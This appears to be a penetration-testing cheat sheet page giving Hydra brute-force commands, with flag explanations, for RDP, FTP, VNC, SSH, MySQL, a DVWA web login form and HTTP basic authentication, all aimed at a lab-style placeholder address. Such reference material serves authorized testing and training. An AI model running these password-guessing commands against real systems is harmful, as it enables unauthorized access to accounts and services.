Hydra

Hydra Brute Force

RDP
hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://10.10.10.10
    -t: number of tasks run in parallel
    -V: verbose
    -f: quit once correct credentials found
    -l: username
    -P: passwords on a file
FTP
hydra -t 5 -V -f -L userlist -P passwordlist ftp://10.10.10.10
    -t: number of tasks run in parallel
    -V: verbose
    -f: quit once correct credentials found
    -l: username list
    -P: password list
VNC
hydra -P passwordlist -t 1 -w 5 -f -s 5901 10.10.10.10 vnc -v
    -s: port to connect to
SSH
hydra -l admin -P passwordlist ssh://10.10.10.10 -V
MySQL
hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.10 mysql -t 4
Web Login
hydra 10.10.10.10 -V -l admin -P passwordlist http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=tjflbmwot3dqbj1ph3tmjchel2; security=low"
Basic Authentication
hydra -l username -P /path/to/wordlist -f 10.10.10.10 http-get /directory
hydra -l username -P /path/to/wordlist -f 10.10.10.10 http-get -s 8080
​

Passwords

Medusa

Last modified 2yr ago